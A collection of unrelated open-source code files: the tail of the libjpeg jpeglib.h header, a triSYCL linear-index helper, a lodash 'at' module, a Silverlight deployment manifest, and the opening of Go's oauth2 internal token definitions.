* processing loop, e.g., "while (next_scanline < image_height)".
*/
JDIMENSION next_scanline; /* 0 .. image_height-1 */
/* Remaining fields are known throughout compressor, but generally
* should not be touched by a surrounding application.
*/
/*
* These fields are computed during compression startup
*/
boolean progressive_mode; /* TRUE if scan script uses progressive mode */
int max_h_samp_factor; /* largest h_samp_factor */
int max_v_samp_factor; /* largest v_samp_factor */
JDIMENSION total_iMCU_rows; /* # of iMCU rows to be input to coef ctlr */
/* The coefficient controller receives data in units of MCU rows as defined
* for fully interleaved scans (whether the JPEG file is interleaved or not).
* There are v_samp_factor * DCTSIZE sample rows of each component in an
* "iMCU" (interleaved MCU) row.
*/
/*
* These fields are valid during any one scan.
* They describe the components and MCUs actually appearing in the scan.
*/
int comps_in_scan; /* # of JPEG components in this scan */
jpeg_component_info * cur_comp_info[MAX_COMPS_IN_SCAN];
/* *cur_comp_info[i] describes component that appears i'th in SOS */
JDIMENSION MCUs_per_row; /* # of MCUs across the image */
JDIMENSION MCU_rows_in_scan; /* # of MCU rows in the image */
int blocks_in_MCU; /* # of DCT blocks per MCU */
int MCU_membership[C_MAX_BLOCKS_IN_MCU];
/* MCU_membership[i] is index in cur_comp_info of component owning */
/* i'th block in an MCU */
int Ss, Se, Ah, Al; /* progressive JPEG parameters for scan */
/*
* Links to compression subobjects (methods and private variables of modules)
*/
struct jpeg_comp_master * master;
struct jpeg_c_main_controller * main;
struct jpeg_c_prep_controller * prep;
struct jpeg_c_coef_controller * coef;
struct jpeg_marker_writer * marker;
struct jpeg_color_converter * cconvert;
struct jpeg_downsampler * downsample;
struct jpeg_forward_dct * fdct;
struct jpeg_entropy_encoder * entropy;
jpeg_scan_info * script_space; /* workspace for jpeg_simple_progression */
int script_space_size;
};
/* Master record for a decompression instance */
struct jpeg_decompress_struct
{
jpeg_common_fields; /* Fields shared with jpeg_compress_struct */
/* Source of compressed data */
struct jpeg_source_mgr * src;
/* Basic description of image --- filled in by jpeg_read_header(). */
/* Application may inspect these values to decide how to process image. */
JDIMENSION image_width; /* nominal image width (from SOF marker) */
JDIMENSION image_height; /* nominal image height */
int num_components; /* # of color components in JPEG image */
J_COLOR_SPACE jpeg_color_space; /* colorspace of JPEG image */
/* Decompression processing parameters --- these fields must be set before
* calling jpeg_start_decompress(). Note that jpeg_read_header() initializes
* them to default values.
*/
J_COLOR_SPACE out_color_space; /* colorspace for output */
unsigned int scale_num, scale_denom; /* fraction by which to scale image */
double output_gamma; /* image gamma wanted in output */
boolean buffered_image; /* TRUE=multiple output passes */
boolean raw_data_out; /* TRUE=downsampled data wanted */
J_DCT_METHOD dct_method; /* IDCT algorithm selector */
boolean do_fancy_upsampling; /* TRUE=apply fancy upsampling */
boolean do_block_smoothing; /* TRUE=apply interblock smoothing */
boolean quantize_colors; /* TRUE=colormapped output wanted */
/* the following are ignored if not quantize_colors: */
J_DITHER_MODE dither_mode; /* type of color dithering to use */
boolean two_pass_quantize; /* TRUE=use two-pass color quantization */
int desired_number_of_colors; /* max # colors to use in created colormap */
/* these are significant only in buffered-image mode: */
boolean enable_1pass_quant; /* enable future use of 1-pass quantizer */
boolean enable_external_quant;/* enable future use of external colormap */
boolean enable_2pass_quant; /* enable future use of 2-pass quantizer */
/* Description of actual output image that will be returned to application.
* These fields are computed by jpeg_start_decompress().
* You can also use jpeg_calc_output_dimensions() to determine these values
* in advance of calling jpeg_start_decompress().
*/
JDIMENSION output_width; /* scaled image width */
JDIMENSION output_height; /* scaled image height */
int out_color_components; /* # of color components in out_color_space */
int output_components; /* # of color components returned */
/* output_components is 1 (a colormap index) when quantizing colors;
* otherwise it equals out_color_components.
*/
int rec_outbuf_height; /* min recommended height of scanline buffer */
/* If the buffer passed to jpeg_read_scanlines() is less than this many rows
* high, space and time will be wasted due to unnecessary data copying.
* Usually rec_outbuf_height will be 1 or 2, at most 4.
*/
/* When quantizing colors, the output colormap is described by these fields.
* The application can supply a colormap by setting colormap non-NULL before
* calling jpeg_start_decompress; otherwise a colormap is created during
* jpeg_start_decompress or jpeg_start_output.
* The map has out_color_components rows and actual_number_of_colors columns.
*/
int actual_number_of_colors; /* number of entries in use */
JSAMPARRAY colormap; /* The color map as a 2-D pixel array */
/* State variables: these variables indicate the progress of decompression.
* The application may examine these but must not modify them.
*/
/* Row index of next scanline to be read from jpeg_read_scanlines().
* Application may use this to control its processing loop, e.g.,
* "while (output_scanline < output_height)".
*/
JDIMENSION output_scanline; /* 0 .. output_height-1 */
/* Current input scan number and number of iMCU rows completed in scan.
* These indicate the progress of the decompressor input side.
*/
int input_scan_number; /* Number of SOS markers seen so far */
JDIMENSION input_iMCU_row; /* Number of iMCU rows completed */
/* The "output scan number" is the notional scan being displayed by the
* output side. The decompressor will not allow output scan/row number
* to get ahead of input scan/row, but it can fall arbitrarily far behind.
*/
int output_scan_number; /* Nominal scan number being displayed */
JDIMENSION output_iMCU_row; /* Number of iMCU rows read */
/* Current progression status. coef_bits[c][i] indicates the precision
* with which component c's DCT coefficient i (in zigzag order) is known.
* It is -1 when no data has yet been received, otherwise it is the point
* transform (shift) value for the most recent scan of the coefficient
* (thus, 0 at completion of the progression).
* This pointer is NULL when reading a non-progressive file.
*/
int (*coef_bits)[DCTSIZE2]; /* -1 or current Al value for each coef */
/* Internal JPEG parameters --- the application usually need not look at
* these fields. Note that the decompressor output side may not use
* any parameters that can change between scans.
*/
/* Quantization and Huffman tables are carried forward across input
* datastreams when processing abbreviated JPEG datastreams.
*/
JQUANT_TBL * quant_tbl_ptrs[NUM_QUANT_TBLS];
/* ptrs to coefficient quantization tables, or NULL if not defined */
JHUFF_TBL * dc_huff_tbl_ptrs[NUM_HUFF_TBLS];
JHUFF_TBL * ac_huff_tbl_ptrs[NUM_HUFF_TBLS];
/* ptrs to Huffman coding tables, or NULL if not defined */
/* These parameters are never carried across datastreams, since they
* are given in SOF/SOS markers or defined to be reset by SOI.
*/
int data_precision; /* bits of precision in image data */
jpeg_component_info * comp_info;
/* comp_info[i] describes component that appears i'th in SOF */
boolean progressive_mode; /* TRUE if SOFn specifies progressive mode */
boolean arith_code; /* TRUE=arithmetic coding, FALSE=Huffman */
UINT8 arith_dc_L[NUM_ARITH_TBLS]; /* L values for DC arith-coding tables */
UINT8 arith_dc_U[NUM_ARITH_TBLS]; /* U values for DC arith-coding tables */
UINT8 arith_ac_K[NUM_ARITH_TBLS]; /* Kx values for AC arith-coding tables */
unsigned int restart_interval; /* MCUs per restart interval, or 0 for no restart */
/* These fields record data obtained from optional markers recognized by
* the JPEG library.
*/
boolean saw_JFIF_marker; /* TRUE iff a JFIF APP0 marker was found */
/* Data copied from JFIF marker; only valid if saw_JFIF_marker is TRUE: */
UINT8 JFIF_major_version; /* JFIF version number */
UINT8 JFIF_minor_version;
UINT8 density_unit; /* JFIF code for pixel size units */
UINT16 X_density; /* Horizontal pixel density */
UINT16 Y_density; /* Vertical pixel density */
boolean saw_Adobe_marker; /* TRUE iff an Adobe APP14 marker was found */
UINT8 Adobe_transform; /* Color transform code from Adobe marker */
boolean CCIR601_sampling; /* TRUE=first samples are cosited */
/* Aside from the specific data retained from APPn markers known to the
* library, the uninterpreted contents of any or all APPn and COM markers
* can be saved in a list for examination by the application.
*/
jpeg_saved_marker_ptr marker_list; /* Head of list of saved markers */
/* Remaining fields are known throughout decompressor, but generally
* should not be touched by a surrounding application.
*/
/*
* These fields are computed during decompression startup
*/
int max_h_samp_factor; /* largest h_samp_factor */
int max_v_samp_factor; /* largest v_samp_factor */
int min_DCT_scaled_size; /* smallest DCT_scaled_size of any component */
JDIMENSION total_iMCU_rows; /* # of iMCU rows in image */
/* The coefficient controller's input and output progress is measured in
* units of "iMCU" (interleaved MCU) rows. These are the same as MCU rows
* in fully interleaved JPEG scans, but are used whether the scan is
* interleaved or not. We define an iMCU row as v_samp_factor DCT block
* rows of each component. Therefore, the IDCT output contains
* v_samp_factor*DCT_scaled_size sample rows of a component per iMCU row.
*/
JSAMPLE * sample_range_limit; /* table for fast range-limiting */
/*
* These fields are valid during any one scan.
* They describe the components and MCUs actually appearing in the scan.
* Note that the decompressor output side must not use these fields.
*/
int comps_in_scan; /* # of JPEG components in this scan */
jpeg_component_info * cur_comp_info[MAX_COMPS_IN_SCAN];
/* *cur_comp_info[i] describes component that appears i'th in SOS */
JDIMENSION MCUs_per_row; /* # of MCUs across the image */
JDIMENSION MCU_rows_in_scan; /* # of MCU rows in the image */
int blocks_in_MCU; /* # of DCT blocks per MCU */
int MCU_membership[D_MAX_BLOCKS_IN_MCU];
/* MCU_membership[i] is index in cur_comp_info of component owning */
/* i'th block in an MCU */
int Ss, Se, Ah, Al; /* progressive JPEG parameters for scan */
/* This field is shared between entropy decoder and marker parser.
* It is either zero or the code of a JPEG marker that has been
* read from the data source, but has not yet been processed.
*/
int unread_marker;
/*
* Links to decompression subobjects (methods, private variables of modules)
*/
struct jpeg_decomp_master * master;
struct jpeg_d_main_controller * main;
struct jpeg_d_coef_controller * coef;
struct jpeg_d_post_controller * post;
struct jpeg_input_controller * inputctl;
struct jpeg_marker_reader * marker;
struct jpeg_entropy_decoder * entropy;
struct jpeg_inverse_dct * idct;
struct jpeg_upsampler * upsample;
struct jpeg_color_deconverter * cconvert;
struct jpeg_color_quantizer * cquantize;
};
/* "Object" declarations for JPEG modules that may be supplied or called
* directly by the surrounding application.
* As with all objects in the JPEG library, these structs only define the
* publicly visible methods and state variables of a module. Additional
* private fields may exist after the public ones.
*/
/* Error handler object */
struct jpeg_error_mgr {
/* Error exit handler: does not return to caller */
JMETHOD(void, error_exit, (j_common_ptr cinfo));
/* Conditionally emit a trace or warning message */
JMETHOD(void, emit_message, (j_common_ptr cinfo, int msg_level));
/* Routine that actually outputs a trace or error message */
JMETHOD(void, output_message, (j_common_ptr cinfo));
/* Format a message string for the most recent JPEG error or message */
JMETHOD(void, format_message, (j_common_ptr cinfo, char * buffer));
#define JMSG_LENGTH_MAX 200 /* recommended size of format_message buffer */
/* Reset error state variables at start of a new image */
JMETHOD(void, reset_error_mgr, (j_common_ptr cinfo));
/* The message ID code and any parameters are saved here.
* A message can have one string parameter or up to 8 int parameters.
*/
int msg_code;
#define JMSG_STR_PARM_MAX 80
union {
int i[8];
char s[JMSG_STR_PARM_MAX];
} msg_parm;
/* Standard state variables for error facility */
int trace_level; /* max msg_level that will be displayed */
/* For recoverable corrupt-data errors, we emit a warning message,
* but keep going unless emit_message chooses to abort. emit_message
* should count warnings in num_warnings. The surrounding application
* can check for bad data by seeing if num_warnings is nonzero at the
* end of processing.
*/
long num_warnings; /* number of corrupt-data warnings */
/* These fields point to the table(s) of error message strings.
* An application can change the table pointer to switch to a different
* message list (typically, to change the language in which errors are
* reported). Some applications may wish to add additional error codes
* that will be handled by the JPEG library error mechanism; the second
* table pointer is used for this purpose.
*
* First table includes all errors generated by JPEG library itself.
* Error code 0 is reserved for a "no such error string" message.
*/
const char * const * jpeg_message_table; /* Library errors */
int last_jpeg_message; /* Table contains strings 0..last_jpeg_message */
/* Second table can be added by application (see cjpeg/djpeg for example).
* It contains strings numbered first_addon_message..last_addon_message.
*/
const char * const * addon_message_table; /* Non-library errors */
int first_addon_message; /* code for first string in addon table */
int last_addon_message; /* code for last string in addon table */
};
/* Progress monitor object */
struct jpeg_progress_mgr {
JMETHOD(void, progress_monitor, (j_common_ptr cinfo));
long pass_counter; /* work units completed in this pass */
long pass_limit; /* total number of work units in this pass */
int completed_passes; /* passes completed so far */
int total_passes; /* total number of passes expected */
};
/* Data destination object for compression */
struct jpeg_destination_mgr {
JOCTET * next_output_byte; /* => next byte to write in buffer */
size_t free_in_buffer; /* # of byte spaces remaining in buffer */
JMETHOD(void, init_destination, (j_compress_ptr cinfo));
JMETHOD(boolean, empty_output_buffer, (j_compress_ptr cinfo));
JMETHOD(void, term_destination, (j_compress_ptr cinfo));
};
/* Data source object for decompression */
typedef struct jpeg_source_mgr
{
FILE * infile; /* source stream */
JOCTET * buffer; /* start of buffer */
boolean start_of_file; /* have we gotten any data yet? */
const JOCTET * next_input_byte; /* => next byte to read from buffer */
size_t bytes_in_buffer; /* # of bytes remaining in buffer */
JMETHOD(void, init_source, (j_decompress_ptr cinfo));
JMETHOD(boolean, fill_input_buffer, (j_decompress_ptr cinfo));
JMETHOD(void, skip_input_data, (j_decompress_ptr cinfo, long num_bytes));
JMETHOD(boolean, resync_to_restart, (j_decompress_ptr cinfo, int desired));
JMETHOD(void, term_source, (j_decompress_ptr cinfo));
} jpeg_source_mgr;
/* Memory manager object.
* Allocates "small" objects (a few K total), "large" objects (tens of K),
* and "really big" objects (virtual arrays with backing store if needed).
* The memory manager does not allow individual objects to be freed; rather,
* each created object is assigned to a pool, and whole pools can be freed
* at once. This is faster and more convenient than remembering exactly what
* to free, especially where malloc()/free() are not too speedy.
* NB: alloc routines never return NULL. They exit to error_exit if not
* successful.
*/
#define JPOOL_PERMANENT 0 /* lasts until master record is destroyed */
#define JPOOL_IMAGE 1 /* lasts until done with image/datastream */
#define JPOOL_NUMPOOLS 2
typedef struct jvirt_sarray_control * jvirt_sarray_ptr;
typedef struct jvirt_barray_control * jvirt_barray_ptr;
struct jpeg_memory_mgr {
/* Method pointers */
JMETHOD(void *, alloc_small, (j_common_ptr cinfo, int pool_id,
size_t sizeofobject));
JMETHOD(void FAR *, alloc_large, (j_common_ptr cinfo, int pool_id,
size_t sizeofobject));
JMETHOD(JSAMPARRAY, alloc_sarray, (j_common_ptr cinfo, int pool_id,
JDIMENSION samplesperrow,
JDIMENSION numrows));
JMETHOD(JBLOCKARRAY, alloc_barray, (j_common_ptr cinfo, int pool_id,
JDIMENSION blocksperrow,
JDIMENSION numrows));
JMETHOD(jvirt_sarray_ptr, request_virt_sarray, (j_common_ptr cinfo,
int pool_id,
boolean pre_zero,
JDIMENSION samplesperrow,
JDIMENSION numrows,
JDIMENSION maxaccess));
JMETHOD(jvirt_barray_ptr, request_virt_barray, (j_common_ptr cinfo,
int pool_id,
boolean pre_zero,
JDIMENSION blocksperrow,
JDIMENSION numrows,
JDIMENSION maxaccess));
JMETHOD(void, realize_virt_arrays, (j_common_ptr cinfo));
JMETHOD(JSAMPARRAY, access_virt_sarray, (j_common_ptr cinfo,
jvirt_sarray_ptr ptr,
JDIMENSION start_row,
JDIMENSION num_rows,
boolean writable));
JMETHOD(JBLOCKARRAY, access_virt_barray, (j_common_ptr cinfo,
jvirt_barray_ptr ptr,
JDIMENSION start_row,
JDIMENSION num_rows,
boolean writable));
JMETHOD(void, free_pool, (j_common_ptr cinfo, int pool_id));
JMETHOD(void, self_destruct, (j_common_ptr cinfo));
/* Limit on memory allocation for this JPEG object. (Note that this is
* merely advisory, not a guaranteed maximum; it only affects the space
* used for virtual-array buffers.) May be changed by outer application
* after creating the JPEG object.
*/
long max_memory_to_use;
/* Maximum allocation request accepted by alloc_large. */
long max_alloc_chunk;
};
/* Routine signature for application-supplied marker processing methods.
* Need not pass marker code since it is stored in cinfo->unread_marker.
*/
typedef JMETHOD(boolean, jpeg_marker_parser_method, (j_decompress_ptr cinfo));
/* Declarations for routines called by application.
* The JPP macro hides prototype parameters from compilers that can't cope.
* Note JPP requires double parentheses.
*/
#ifdef HAVE_PROTOTYPES
#define JPP(arglist) arglist
#else
#define JPP(arglist) ()
#endif
/* Short forms of external names for systems with brain-damaged linkers.
* We shorten external names to be unique in the first six letters, which
* is good enough for all known systems.
* (If your compiler itself needs names to be unique in less than 15
* characters, you are out of luck. Get a better compiler.)
*/
#ifdef NEED_SHORT_EXTERNAL_NAMES
#define jpeg_std_error jStdError
#define jpeg_CreateCompress jCreaCompress
#define jpeg_CreateDecompress jCreaDecompress
#define jpeg_destroy_compress jDestCompress
#define jpeg_destroy_decompress jDestDecompress
#define jpeg_stdio_dest jStdDest
#define jpeg_stdio_src jStdSrc
#define jpeg_set_defaults jSetDefaults
#define jpeg_set_colorspace jSetColorspace
#define jpeg_default_colorspace jDefColorspace
#define jpeg_set_quality jSetQuality
#define jpeg_set_linear_quality jSetLQuality
#define jpeg_add_quant_table jAddQuantTable
#define jpeg_quality_scaling jQualityScaling
#define jpeg_simple_progression jSimProgress
#define jpeg_suppress_tables jSuppressTables
#define jpeg_alloc_quant_table jAlcQTable
#define jpeg_alloc_huff_table jAlcHTable
#define jpeg_start_compress jStrtCompress
#define jpeg_write_scanlines jWrtScanlines
#define jpeg_finish_compress jFinCompress
#define jpeg_write_raw_data jWrtRawData
#define jpeg_write_marker jWrtMarker
#define jpeg_write_m_header jWrtMHeader
#define jpeg_write_m_byte jWrtMByte
#define jpeg_write_tables jWrtTables
#define jpeg_read_header jReadHeader
#define jpeg_start_decompress jStrtDecompress
#define jpeg_read_scanlines jReadScanlines
#define jpeg_finish_decompress jFinDecompress
#define jpeg_read_raw_data jReadRawData
#define jpeg_has_multiple_scans jHasMultScn
#define jpeg_start_output jStrtOutput
#define jpeg_finish_output jFinOutput
#define jpeg_input_complete jInComplete
#define jpeg_new_colormap jNewCMap
#define jpeg_consume_input jConsumeInput
#define jpeg_calc_output_dimensions jCalcDimensions
#define jpeg_save_markers jSaveMarkers
#define jpeg_set_marker_processor jSetMarker
#define jpeg_read_coefficients jReadCoefs
#define jpeg_write_coefficients jWrtCoefs
#define jpeg_copy_critical_parameters jCopyCrit
#define jpeg_abort_compress jAbrtCompress
#define jpeg_abort_decompress jAbrtDecompress
#define jpeg_abort jAbort
#define jpeg_destroy jDestroy
#define jpeg_resync_to_restart jResyncRestart
#endif /* NEED_SHORT_EXTERNAL_NAMES */
/* Default error-management setup */
EXTERN(struct jpeg_error_mgr *) jpeg_std_error
JPP((struct jpeg_error_mgr * err));
/* Initialization of JPEG compression objects.
* jpeg_create_compress() and jpeg_create_decompress() are the exported
* names that applications should call. These expand to calls on
* jpeg_CreateCompress and jpeg_CreateDecompress with additional information
* passed for version mismatch checking.
* NB: you must set up the error-manager BEFORE calling jpeg_create_xxx.
*/
#define jpeg_create_compress(cinfo) \
jpeg_CreateCompress((cinfo), JPEG_LIB_VERSION, \
(size_t) sizeof(struct jpeg_compress_struct))
#define jpeg_create_decompress(cinfo) \
jpeg_CreateDecompress((cinfo), JPEG_LIB_VERSION, \
(size_t) sizeof(struct jpeg_decompress_struct))
EXTERN(void) jpeg_CreateCompress JPP((j_compress_ptr cinfo,
int version, size_t structsize));
EXTERN(void) jpeg_CreateDecompress JPP((j_decompress_ptr cinfo,
int version, size_t structsize));
/* Destruction of JPEG compression objects */
EXTERN(void) jpeg_destroy_compress JPP((j_compress_ptr cinfo));
EXTERN(void) jpeg_destroy_decompress JPP((j_decompress_ptr cinfo));
/* Standard data source and destination managers: stdio streams. */
/* Caller is responsible for opening the file before and closing after. */
EXTERN(void) jpeg_stdio_dest JPP((j_compress_ptr cinfo, FILE * outfile));
EXTERN(void) jpeg_stdio_src JPP((j_decompress_ptr cinfo, FILE * infile));
/* Default parameter setup for compression */
EXTERN(void) jpeg_set_defaults JPP((j_compress_ptr cinfo));
/* Compression parameter setup aids */
EXTERN(void) jpeg_set_colorspace JPP((j_compress_ptr cinfo,
J_COLOR_SPACE colorspace));
EXTERN(void) jpeg_default_colorspace JPP((j_compress_ptr cinfo));
EXTERN(void) jpeg_set_quality JPP((j_compress_ptr cinfo, int quality,
boolean force_baseline));
EXTERN(void) jpeg_set_linear_quality JPP((j_compress_ptr cinfo,
int scale_factor,
boolean force_baseline));
EXTERN(void) jpeg_add_quant_table JPP((j_compress_ptr cinfo, int which_tbl,
const unsigned int *basic_table,
int scale_factor,
boolean force_baseline));
EXTERN(int) jpeg_quality_scaling JPP((int quality));
EXTERN(void) jpeg_simple_progression JPP((j_compress_ptr cinfo));
EXTERN(void) jpeg_suppress_tables JPP((j_compress_ptr cinfo,
boolean suppress));
EXTERN(JQUANT_TBL *) jpeg_alloc_quant_table JPP((j_common_ptr cinfo));
EXTERN(JHUFF_TBL *) jpeg_alloc_huff_table JPP((j_common_ptr cinfo));
/* Main entry points for compression */
EXTERN(void) jpeg_start_compress JPP((j_compress_ptr cinfo,
boolean write_all_tables));
EXTERN(JDIMENSION) jpeg_write_scanlines JPP((j_compress_ptr cinfo,
JSAMPARRAY scanlines,
JDIMENSION num_lines));
EXTERN(void) jpeg_finish_compress JPP((j_compress_ptr cinfo));
/* Replaces jpeg_write_scanlines when writing raw downsampled data. */
EXTERN(JDIMENSION) jpeg_write_raw_data JPP((j_compress_ptr cinfo,
JSAMPIMAGE data,
JDIMENSION num_lines));
/* Write a special marker. See libjpeg.doc concerning safe usage. */
EXTERN(void) jpeg_write_marker
JPP((j_compress_ptr cinfo, int marker,
const JOCTET * dataptr, unsigned int datalen));
/* Same, but piecemeal. */
EXTERN(void) jpeg_write_m_header
JPP((j_compress_ptr cinfo, int marker, unsigned int datalen));
EXTERN(void) jpeg_write_m_byte
JPP((j_compress_ptr cinfo, int val));
/* Alternate compression function: just write an abbreviated table file */
EXTERN(void) jpeg_write_tables JPP((j_compress_ptr cinfo));
/* Decompression startup: read start of JPEG datastream to see what's there */
EXTERN(int) jpeg_read_header JPP((j_decompress_ptr cinfo,
boolean require_image));
/* Return value is one of: */
#define JPEG_SUSPENDED 0 /* Suspended due to lack of input data */
#define JPEG_HEADER_OK 1 /* Found valid image datastream */
#define JPEG_HEADER_TABLES_ONLY 2 /* Found valid table-specs-only datastream */
/* If you pass require_image = TRUE (normal case), you need not check for
* a TABLES_ONLY return code; an abbreviated file will cause an error exit.
* JPEG_SUSPENDED is only possible if you use a data source module that can
* give a suspension return (the stdio source module doesn't).
*/
/* Main entry points for decompression */
EXTERN(boolean) jpeg_start_decompress JPP((j_decompress_ptr cinfo));
EXTERN(JDIMENSION) jpeg_read_scanlines JPP((j_decompress_ptr cinfo,
JSAMPARRAY scanlines,
JDIMENSION max_lines));
EXTERN(boolean) jpeg_finish_decompress JPP((j_decompress_ptr cinfo));
/* Replaces jpeg_read_scanlines when reading raw downsampled data. */
EXTERN(JDIMENSION) jpeg_read_raw_data JPP((j_decompress_ptr cinfo,
JSAMPIMAGE data,
JDIMENSION max_lines));
/* Additional entry points for buffered-image mode. */
EXTERN(boolean) jpeg_has_multiple_scans JPP((j_decompress_ptr cinfo));
EXTERN(boolean) jpeg_start_output JPP((j_decompress_ptr cinfo,
int scan_number));
EXTERN(boolean) jpeg_finish_output JPP((j_decompress_ptr cinfo));
EXTERN(boolean) jpeg_input_complete JPP((j_decompress_ptr cinfo));
EXTERN(void) jpeg_new_colormap JPP((j_decompress_ptr cinfo));
EXTERN(int) jpeg_consume_input JPP((j_decompress_ptr cinfo));
/* Return value is one of: */
/* #define JPEG_SUSPENDED 0 Suspended due to lack of input data */
#define JPEG_REACHED_SOS 1 /* Reached start of new scan */
#define JPEG_REACHED_EOI 2 /* Reached end of image */
#define JPEG_ROW_COMPLETED 3 /* Completed one iMCU row */
#define JPEG_SCAN_COMPLETED 4 /* Completed last iMCU row of a scan */
/* Precalculate output dimensions for current decompression parameters. */
EXTERN(void) jpeg_calc_output_dimensions JPP((j_decompress_ptr cinfo));
/* Control saving of COM and APPn markers into marker_list. */
EXTERN(void) jpeg_save_markers
JPP((j_decompress_ptr cinfo, int marker_code,
unsigned int length_limit));
/* Install a special processing method for COM or APPn markers. */
EXTERN(void) jpeg_set_marker_processor
JPP((j_decompress_ptr cinfo, int marker_code,
jpeg_marker_parser_method routine));
/* Read or write raw DCT coefficients --- useful for lossless transcoding. */
EXTERN(jvirt_barray_ptr *) jpeg_read_coefficients JPP((j_decompress_ptr cinfo));
EXTERN(void) jpeg_write_coefficients JPP((j_compress_ptr cinfo,
jvirt_barray_ptr * coef_arrays));
EXTERN(void) jpeg_copy_critical_parameters JPP((j_decompress_ptr srcinfo,
j_compress_ptr dstinfo));
/* If you choose to abort compression or decompression before completing
* jpeg_finish_(de)compress, then you need to clean up to release memory,
* temporary files, etc. You can just call jpeg_destroy_(de)compress
* if you're done with the JPEG object, but if you want to clean it up and
* reuse it, call this:
*/
EXTERN(void) jpeg_abort_compress JPP((j_compress_ptr cinfo));
EXTERN(void) jpeg_abort_decompress JPP((j_decompress_ptr cinfo));
EXTERN(void)default_decompress_parms JPP((j_decompress_ptr cinfo));
/* Generic versions of jpeg_abort and jpeg_destroy that work on either
* flavor of JPEG object. These may be more convenient in some places.
*/
EXTERN(void) jpeg_abort JPP((j_common_ptr cinfo));
EXTERN(void) jpeg_destroy JPP((j_common_ptr cinfo));
/* Default restart-marker-resync procedure for use by data source modules */
EXTERN(boolean) jpeg_resync_to_restart JPP((j_decompress_ptr cinfo,
int desired));
/* These marker codes are exported since applications and data source modules
* are likely to want to use them.
*/
#define JPEG_RST0 0xD0 /* RST0 marker code */
#define JPEG_EOI 0xD9 /* EOI marker code */
#define JPEG_APP0 0xE0 /* APP0 marker code */
#define JPEG_COM 0xFE /* COM marker code */
/* If we have a brain-damaged compiler that emits warnings (or worse, errors)
* for structure definitions that are never filled in, keep it quiet by
* supplying dummy definitions for the various substructures.
*/
#ifdef INCOMPLETE_TYPES_BROKEN
#ifndef JPEG_INTERNALS /* will be defined in jpegint.h */
struct jvirt_sarray_control { long dummy; };
struct jvirt_barray_control { long dummy; };
struct jpeg_comp_master { long dummy; };
struct jpeg_c_main_controller { long dummy; };
struct jpeg_c_prep_controller { long dummy; };
struct jpeg_c_coef_controller { long dummy; };
struct jpeg_marker_writer { long dummy; };
struct jpeg_color_converter { long dummy; };
struct jpeg_downsampler { long dummy; };
struct jpeg_forward_dct { long dummy; };
struct jpeg_entropy_encoder { long dummy; };
struct jpeg_decomp_master { long dummy; };
struct jpeg_d_main_controller { long dummy; };
struct jpeg_d_coef_controller { long dummy; };
struct jpeg_d_post_controller { long dummy; };
struct jpeg_input_controller { long dummy; };
struct jpeg_marker_reader { long dummy; };
struct jpeg_entropy_decoder { long dummy; };
struct jpeg_inverse_dct { long dummy; };
struct jpeg_upsampler { long dummy; };
struct jpeg_color_deconverter { long dummy; };
struct jpeg_color_quantizer { long dummy; };
#endif /* JPEG_INTERNALS */
#endif /* INCOMPLETE_TYPES_BROKEN */
/*
* The JPEG library modules define JPEG_INTERNALS before including this file.
* The internal structure declarations are read only when that is true.
* Applications using the library should not include jpegint.h, but may wish
* to include jerror.h.
*/
#ifdef JPEG_INTERNALS
#include "jpegint.h" /* fetch private declarations */
#include "jerror.h" /* fetch error codes too */
#endif
#if defined(__cplusplus)
};
#endif
#endif /* JPEGLIB_H */
| {
"pile_set_name": "Github"
} |
#ifndef TRISYCL_SYCL_DETAIL_LINEAR_ID_HPP
#define TRISYCL_SYCL_DETAIL_LINEAR_ID_HPP
/** \file Compute linearized array access
Ronan at Keryell point FR
This file is distributed under the University of Illinois Open Source
License. See LICENSE.TXT for details.
*/
#include <cstddef>
namespace trisycl::detail {
/** \addtogroup helpers Some helpers for the implementation
@{
*/
/** Compute a linearized array access used in the OpenCL 2 world
Typically for the get_global_linear_id() and get_local_linear_id()
functions.
*/
template <typename Range, typename Id>
size_t constexpr inline linear_id(Range range, Id id, Id offset = {}) {
auto dims = std::distance(std::begin(range), std::end(range));
size_t linear_id = 0;
/* A good compiler should unroll this and do partial evaluation to
remove the first multiplication by 0 of this Horner evaluation and
remove the 0 offset evaluation */
for (int i = dims - 1; i >= 0; --i)
linear_id = linear_id*range[i] + id[i] - offset[i];
return linear_id;
}
/// @} End the helpers Doxygen group
}
/*
# Some Emacs stuff:
### Local Variables:
### ispell-local-dictionary: "american"
### eval: (flyspell-prog-mode)
### End:
*/
#endif // TRISYCL_SYCL_DETAIL_LINEAR_ID_HPP
| {
"pile_set_name": "Github"
} |
var baseAt = require('../internal/baseAt'),
baseFlatten = require('../internal/baseFlatten'),
restParam = require('../function/restParam');
/**
* Creates an array of elements corresponding to the given keys, or indexes,
* of `collection`. Keys may be specified as individual arguments or as arrays
* of keys.
*
* @static
* @memberOf _
* @category Collection
* @param {Array|Object|string} collection The collection to iterate over.
* @param {...(number|number[]|string|string[])} [props] The property names
* or indexes of elements to pick, specified individually or in arrays.
* @returns {Array} Returns the new array of picked elements.
* @example
*
* _.at(['a', 'b', 'c'], [0, 2]);
* // => ['a', 'c']
*
* _.at(['barney', 'fred', 'pebbles'], 0, 2);
* // => ['barney', 'pebbles']
*/
var at = restParam(function(collection, props) {
return baseAt(collection, baseFlatten(props));
});
module.exports = at;
| {
"pile_set_name": "Github"
} |
<Deployment xmlns="http://schemas.microsoft.com/client/2007/deployment"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
>
<Deployment.Parts>
</Deployment.Parts>
</Deployment>
| {
"pile_set_name": "Github"
} |
// Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package internal
import (
"context"
"encoding/json"
"errors"
"fmt"
"io"
"io/ioutil"
"math"
"mime"
"net/http"
"net/url"
"strconv"
"strings"
"sync"
"time"
"golang.org/x/net/context/ctxhttp"
)
// Token represents the credentials used to authorize
// the requests to access protected resources on the OAuth 2.0
// provider's backend.
//
// This type is a mirror of oauth2.Token and exists to break
// an otherwise-circular dependency. Other internal packages
// should convert this Token into an oauth2.Token before use.
type Token struct {
// AccessToken is the token that authorizes and authenticates
// the requests.
AccessToken string
// TokenType is the type of token.
// The Type method returns either this or "Bearer", the default.
TokenType string
// RefreshToken is a token that's used by the application
// (as opposed to the user) to refresh the access token
// if it expires.
RefreshToken string
// Expiry is the optional expiration time of the access token.
//
// If zero, TokenSource implementations will reuse the same
// token forever and RefreshToken or equivalent
// mechanisms for that TokenSource will not be used.
Expiry time.Time
// Raw optionally contains extra metadata from the server
// when updating a token.
Raw interface{}
}
// tokenJSON is the struct representing the HTTP response from OAuth2
// providers returning a token in JSON form.
type tokenJSON struct {
AccessToken string `json:"access_token"`
